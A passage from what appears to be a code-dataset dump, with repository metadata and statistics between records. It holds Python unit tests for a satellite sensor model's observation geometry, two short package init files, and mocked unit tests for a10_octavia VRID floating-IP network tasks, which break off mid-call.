SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': orbital_speed(alt*1e-3), 'vz [km/s]': 0}
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*abs(poi_lat_deg), delta = 0.15)
# test 90 deg orbit inclination
poi_lat_deg = -1*random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*poi_lat_deg)))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': orbital_speed(alt*1e-3)}
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lat_deg), delta = 0.15)
def test_calc_data_metrics_5_1(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to North.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector do not influence the calcs.
Test with reference model which is good for small angles
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test positive look angle, 0 deg orbit inclination
poi_lat_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test negative look angle, 0 deg orbit inclination
poi_lat_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': -7.6126, 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
# test 90 deg orbit inclination
poi_lat_deg = random.uniform(0.01, 0.1)
nadir_angle_deg = abs(np.rad2deg(RE*np.deg2rad(poi_lat_deg)/ 500))
range_km = 500/np.cos(np.deg2rad(nadir_angle_deg))
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6878.137, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': 7.6126} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], nadir_angle_deg, delta = 0.15)
self.assertAlmostEqual(obsv_metrics["solar zenith [deg]"], 20.335, delta = 0.1) # precomputed value at the epoch and near the (lat=0, lon=0) position
def test_calc_data_metrics_5_2(self):
""" Test with satellite above POI at (lat = 0,lon = 0), and making observation to North.
Date chosen so that ECEF and ECI frames are aligned.
Sensor specs do not influence the below calcs. They do however shall influence the coverage calcs (which is not covered by this test).
Velocity vector do not influence the calcs.
Test with alternate reference model which works for larger angles for a special case with range = RE
"""
o = BasicSensorModel.from_json('{}')
epoch_JDUT1 = 2458543.06088 # 2019 Feb 28 13:27:40 is time at which the ECEF and ECI frames approximately align, hence ECEF to ECI rotation is identity. See <https://www.celnav.de/longterm.htm> online calculator of GMST.
# test positive look angle, 0 deg orbit inclination
poi_lat_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lat_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': orbital_speed(alt*1e-3), 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lat_deg), delta = 0.15)
# test negative look angle, 0 deg orbit inclination
poi_lat_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lat_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': -1*orbital_speed(alt*1e-3), 'vz [km/s]': 0} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], -1*abs(poi_lat_deg), delta = 0.15)
# test 90 deg orbit inclination
poi_lat_deg = random.uniform(10, 45)
range_km = RE # fix range to RE, an isosceles triangle forms
alt = np.sqrt(RE*RE*(2-2*np.cos(np.deg2rad(180-2*abs(poi_lat_deg))))) - RE
SpacecraftOrbitState = {'time [JDUT1]':epoch_JDUT1, 'x [km]': 6378.137+alt, 'y [km]': 0, 'z [km]': 0, 'vx [km/s]': 0, 'vy [km/s]': 0, 'vz [km/s]': orbital_speed(alt*1e-3)} # altitude 500 km
TargetCoords = {'lat [deg]': poi_lat_deg, 'lon [deg]': 0}
obsv_metrics = o.calc_data_metrics(SpacecraftOrbitState, TargetCoords)
self.assertAlmostEqual(obsv_metrics["observation range [km]"], range_km, delta = 1)
self.assertAlmostEqual(obsv_metrics["incidence angle [deg]"], 2*abs(poi_lat_deg), delta = 0.15)
self.assertAlmostEqual(obsv_metrics["look angle [deg]"], abs(poi_lat_deg), delta = 0.15)
def test_get_id(self): #@TODO
pass
def test_get_field_of_view(self): #@TODO
pass
def test_get_scene_field_of_view(self): #@TODO
pass
def test_get_field_of_regard(self): #@TODO
pass
def test_get_orientation(self): #@TODO
pass
def test_get_pixel_config(self): #@TODO
o = BasicSensorModel.from_json('{}')
self.assertEqual(o.get_pixel_config().numberDetectorRows,4)
self.assertEqual(o.get_pixel_config().numberDetectorCols,4)
o = BasicSensorModel.from_json('{"numberDetectorRows":5, "numberDetectorCols":10}')
self.assertEqual(o.get_pixel_config().numberDetectorRows,5)
self.assertEqual(o.get_pixel_config().numberDetectorCols,10)
o = BasicSensorModel.from_json('{"numberDetectorCols":10}')
self.assertEqual(o.get_pixel_config().numberDetectorRows,4)
self.assertEqual(o.get_pixel_config().numberDetectorCols,10)
def test_synthesize_observation(self): #@TODO
pass
def test_get_pointing_option(self): #TODO
pass
| 75.087814
| 234
| 0.645481
| 5,635
| 41,899
| 4.664241
| 0.055368
| 0.047293
| 0.083704
| 0.107142
| 0.898109
| 0.88795
| 0.876955
| 0.870106
| 0.861431
| 0.84743
| 0
| 0.049916
| 0.222058
| 41,899
| 557
| 235
| 75.222621
| 0.756435
| 0.213585
| 0
| 0.724051
| 0
| 0.010127
| 0.18944
| 0.022624
| 0
| 0
| 0
| 0.001795
| 0.407595
| 1
| 0.048101
| false
| 0.017722
| 0.01519
| 0.002532
| 0.068354
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e076407824c3f871dfe6754557da9e2eccb0f00c
| 75
|
py
|
Python
|
screens/objects/__init__.py
|
Blackth01/GamQuiz
|
cbf40dbd40a2dc5c04a9087c465dad90a59614db
|
[
"MIT"
] | 1
|
2019-07-08T00:57:57.000Z
|
2019-07-08T00:57:57.000Z
|
screens/objects/__init__.py
|
Blackth01/GamQuiz
|
cbf40dbd40a2dc5c04a9087c465dad90a59614db
|
[
"MIT"
] | null | null | null |
screens/objects/__init__.py
|
Blackth01/GamQuiz
|
cbf40dbd40a2dc5c04a9087c465dad90a59614db
|
[
"MIT"
] | null | null | null |
from screens.objects.dados import *
from screens.objects.pergunta import *
| 25
| 38
| 0.813333
| 10
| 75
| 6.1
| 0.6
| 0.360656
| 0.590164
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 75
| 2
| 39
| 37.5
| 0.910448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ebc6ab9998db144234c2601c24861b2c48fa339
| 201
|
py
|
Python
|
networkx/algorithms/operators/__init__.py
|
jebogaert/networkx
|
8563c3313223a53c548530f39c8cfb6e433539d3
|
[
"BSD-3-Clause"
] | 10,024
|
2015-01-01T13:06:43.000Z
|
2022-03-31T12:45:25.000Z
|
networkx/algorithms/operators/__init__.py
|
jebogaert/networkx
|
8563c3313223a53c548530f39c8cfb6e433539d3
|
[
"BSD-3-Clause"
] | 3,191
|
2015-01-01T18:13:11.000Z
|
2022-03-31T22:06:00.000Z
|
networkx/algorithms/operators/__init__.py
|
jebogaert/networkx
|
8563c3313223a53c548530f39c8cfb6e433539d3
|
[
"BSD-3-Clause"
] | 3,272
|
2015-01-01T05:04:53.000Z
|
2022-03-31T17:46:35.000Z
|
from networkx.algorithms.operators.all import *
from networkx.algorithms.operators.binary import *
from networkx.algorithms.operators.product import *
from networkx.algorithms.operators.unary import *
| 40.2
| 51
| 0.840796
| 24
| 201
| 7.041667
| 0.375
| 0.284024
| 0.52071
| 0.733728
| 0.656805
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.079602
| 201
| 4
| 52
| 50.25
| 0.913514
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
0ed33d11a8fa5c79dd0d91abb6b9d1f561a683c4
| 31,586
|
py
|
Python
|
a10_octavia/tests/unit/controller/worker/tasks/test_a10_network_tasks.py
|
rahulkatre-a10/a10-octavia
|
cb210069afa5fb3fb2881bbb0aa94da6b6cd5789
|
[
"Apache-2.0"
] | null | null | null |
a10_octavia/tests/unit/controller/worker/tasks/test_a10_network_tasks.py
|
rahulkatre-a10/a10-octavia
|
cb210069afa5fb3fb2881bbb0aa94da6b6cd5789
|
[
"Apache-2.0"
] | null | null | null |
a10_octavia/tests/unit/controller/worker/tasks/test_a10_network_tasks.py
|
rahulkatre-a10/a10-octavia
|
cb210069afa5fb3fb2881bbb0aa94da6b6cd5789
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020, A10 Networks
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import imp
try:
from unittest import mock
except ImportError:
import mock
from oslo_config import cfg
from oslo_config import fixture as oslo_fixture
from octavia.common import data_models as o_data_models
from octavia.network import data_models as o_net_data_models
from a10_octavia.common import config_options
from a10_octavia.common import data_models
from a10_octavia.controller.worker.tasks import a10_network_tasks
from a10_octavia.tests.common import a10constants
from a10_octavia.tests.unit import base
LB = o_data_models.LoadBalancer(id=a10constants.MOCK_LOAD_BALANCER_ID)
MEMBER = o_data_models.Member(subnet_id=a10constants.MOCK_SUBNET_ID)
VTHUNDER = data_models.VThunder()
SUBNET = o_net_data_models.Subnet()
PORT = o_net_data_models.Port()
VRID = data_models.VRID()
VRID_VALUE = 0
SUBNET_1 = o_net_data_models.Subnet(id=a10constants.MOCK_SUBNET_ID)
VRID_1 = data_models.VRID(id=1, subnet_id=a10constants.MOCK_SUBNET_ID)
NAT_POOL = data_models.NATPool(port_id=a10constants.MOCK_PORT_ID)
NAT_FLAVOR = {"pool_name": "p1", "start_address": "1.1.1.1", "end_address": "1.1.1.2"}
HW_THUNDER = data_models.HardwareThunder(
project_id=a10constants.MOCK_PROJECT_ID,
device_name="rack_thunder_1",
undercloud=True,
username="abc",
password="abc",
ip_address="10.10.10.10",
partition_name="shared")
HW_THUNDER2 = data_models.HardwareThunder(
project_id=a10constants.MOCK_PROJECT_ID,
device_name="rack_thunder_2",
undercloud=True,
username="abc",
password="abc",
ip_address="10.10.10.11",
partition_name="shared",
vrid_floating_ip="192.168.8.126")
EXISTING_FIP_SHARED_PARTITION = {
u'vrid': {u'blade-parameters': {
u'priority': 150, u'uuid': u'41e54b26-bc4f-11eb-bd71-525400895118',
u'a10-url': u'/axapi/v3/vrrp-a/vrid/0/blade-parameters'},
u'uuid': u'41e5439c-bc4f-11eb-bd71-525400895118', u'floating-ip': {
u'ip-address-cfg': [{
u'ip-address': u'192.168.8.140'}, {u'ip-address': u'192.168.9.140'}]},
u'vrid-val': 0, u'preempt-mode': {u'threshold': 0, u'disable': 0},
u'a10-url': u'/axapi/v3/vrrp-a/vrid/0'}
}
EXISTING_FIP_L3V_PARTITION = {
u'vrid': {u'blade-parameters': {
u'priority': 150, u'uuid': u'41e54b26-bc4f-11eb-bd71-525400895118',
u'a10-url': u'/axapi/v3/vrrp-a/vrid/0/blade-parameters'},
u'uuid': u'41e5439c-bc4f-11eb-bd71-525400895118', u'floating-ip': {
u'ip-address-part-cfg': [{
u'ip-address-partition': u'192.168.8.140'},
{u'ip-address-partition': u'192.168.9.140'}]},
u'vrid-val': 0, u'preempt-mode': {u'threshold': 0, u'disable': 0},
u'a10-url': u'/axapi/v3/vrrp-a/vrid/0'}
}
class MockIP(object):
def __init__(self, ip_address):
self.ip_address = ip_address
class MockNic(object):
def __init__(self, net_id):
self.network_id = net_id
self.subnet_id = net_id
class TestNetworkTasks(base.BaseTaskTestCase):
def setUp(self):
super(TestNetworkTasks, self).setUp()
imp.reload(a10_network_tasks)
patcher = mock.patch(
'a10_octavia.controller.worker.tasks.a10_network_tasks.BaseNetworkTask.network_driver')
self.network_driver_mock = patcher.start()
self.client_mock = mock.Mock()
self.conf = self.useFixture(oslo_fixture.Config(cfg.CONF))
self.conf.register_opts(config_options.A10_GLOBAL_OPTS,
group=a10constants.A10_GLOBAL_OPTS)
def tearDown(self):
super(TestNetworkTasks, self).tearDown()
self.conf.reset()
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=None)
def test_HandleVRIDFloatingIP_noop_vrrpa_config_not_specified(
self, mock_utils):
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
result = mock_network_task.execute(VTHUNDER, MEMBER, [], subnet, vthunder_config)
self.assertEqual(result, [])
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
def test_HandleVRIDFloatingIP_create_floating_ip_in_shared_partition_with_static_ip(
self, mock_patched_ip, mock_floating_ip):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, None, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FLOATING_IP_1)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_1],
is_partition=False)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
def test_HandleVRIDFloatingIP_create_floating_ip_with_device_name_flavor(
self, mock_patched_ip):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER2)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [], subnet,
vthunder_config, use_device_flavor=True)
mock_network_task.axapi_client.get_vrid_floating_ip_for_project.assert_not_called()
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_1],
is_partition=False)
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_create_floating_ip_in_specified_partition_with_static_ip(
self, mock_utils, mock_patched_ip, get_floating_ip):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
vthunder = copy.deepcopy(VTHUNDER)
vthunder.partition_name = 'partition_1'
vthunder.ip_address = '10.0.0.1'
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_L3V_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, None, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FLOATING_IP_1)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[
a10constants.MOCK_VRID_FLOATING_IP_1], is_partition=True)
@mock.patch(
'a10_octavia.common.utils.check_ip_in_subnet_range',
return_value=False)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
def test_HandleVRIDFloatingIP_create_floating_ip_in_shared_partition_with_dhcp(
self, get_floating_ip, check_subnet):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [VRID_1], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, None, None, fixed_ip=None)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[a10constants.MOCK_VRID_FLOATING_IP_1],
is_partition=False)
@mock.patch(
'a10_octavia.common.utils.check_ip_in_subnet_range',
return_value=False)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value='dhcp')
def test_HandleVRIDFloatingIP_create_floating_ip_in_specified_partition_with_dhcp(
self, get_floating_ip, check_subnet):
member = copy.deepcopy(MEMBER)
member.subnet_id = SUBNET_1.id
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
vthunder_config = copy.deepcopy(HW_THUNDER)
port = copy.deepcopy(PORT)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
vthunder = copy.deepcopy(VTHUNDER)
vthunder.partition_name = 'partition_1'
vthunder.ip_address = '10.0.0.1'
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_L3V_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [VRID_1], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
mock.ANY, None, None, fixed_ip=None)
self.client_mock.vrrpa.update.assert_called_with(
VRID_VALUE, floating_ips=[
a10constants.MOCK_VRID_FLOATING_IP_1], is_partition=True)
@mock.patch(
'a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=None)
def test_HandleVRIDFloatingIP_delete_fip_entries_device_fip_given_but_no_fip_in_conf(
self, mock_utils):
vrid = copy.deepcopy(VRID_1)
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
vrid.vrid = VRID_VALUE
vthunder_config = copy.deepcopy(HW_THUNDER)
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
result = mock_network_task.execute(VTHUNDER, MEMBER, [vrid], SUBNET_1, vthunder_config)
self.network_driver_mock.delete_port.assert_called_with(
vrid.vrid_port_id)
self.client_mock.vrrpa.update.assert_called_with(
vrid.vrid, floating_ips=[], is_partition=False)
self.assertEqual(result, [])
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_1)
def test_HandleVRIDFloatingIP_noop_device_fip_and_conf_fip_both_given_same_ip(
self, mock_patched_ip, get_floating_ip):
vrid = copy.deepcopy(VRID_1)
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_1))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_not_called()
self.client_mock.vrrpa.update.assert_not_called()
@mock.patch('a10_octavia.common.utils.get_vrid_floating_ip_for_project',
return_value=a10constants.MOCK_VRID_FLOATING_IP_2)
@mock.patch('a10_octavia.common.utils.get_patched_ip_address',
return_value=a10constants.MOCK_VRID_FLOATING_IP_2)
@mock.patch('a10_octavia.controller.worker.tasks.a10_network_tasks.a10_task_utils')
def test_HandleVRIDFloatingIP_replace_floating_ip_in_shared_partition_with_static_ip(
self, mock_utils, mock_patched_ip, get_floating_ip):
vrid = copy.deepcopy(VRID_1)
vthunder = copy.deepcopy(VTHUNDER)
vthunder.ip_address = '10.0.0.1'
vrid.vrid_floating_ip = a10constants.MOCK_VRID_FLOATING_IP_1
vrid.vrid = VRID_VALUE
vrid.vrid_port_id = a10constants.MOCK_VRRP_PORT_ID
member = copy.deepcopy(MEMBER)
member.subnet_id = a10constants.MOCK_SUBNET_ID
subnet = copy.deepcopy(SUBNET_1)
subnet.cidr = a10constants.MOCK_SUBNET_CIDR
port = copy.deepcopy(PORT)
vthunder_config = copy.deepcopy(HW_THUNDER)
port.fixed_ips.append(MockIP(a10constants.MOCK_VRID_FLOATING_IP_2))
mock_network_task = a10_network_tasks.HandleVRIDFloatingIP()
mock_network_task.axapi_client = self.client_mock
self.network_driver_mock.get_subnet.return_value = subnet
self.network_driver_mock.allocate_vrid_fip.return_value = port
self.client_mock.vrrpa.get.return_value = EXISTING_FIP_SHARED_PARTITION
self.conf.config(group=a10constants.A10_GLOBAL_OPTS,
vrid=VRID_VALUE)
mock_network_task.execute(vthunder, member, [vrid], subnet, vthunder_config)
self.network_driver_mock.allocate_vrid_fip.assert_called_with(
vrid, subnet.network_id, mock.ANY,
fixed_ip=a10constants.MOCK_VRID_FLOATING_IP_2)
self.client_mock.vrrpa.update.assert_called_with(
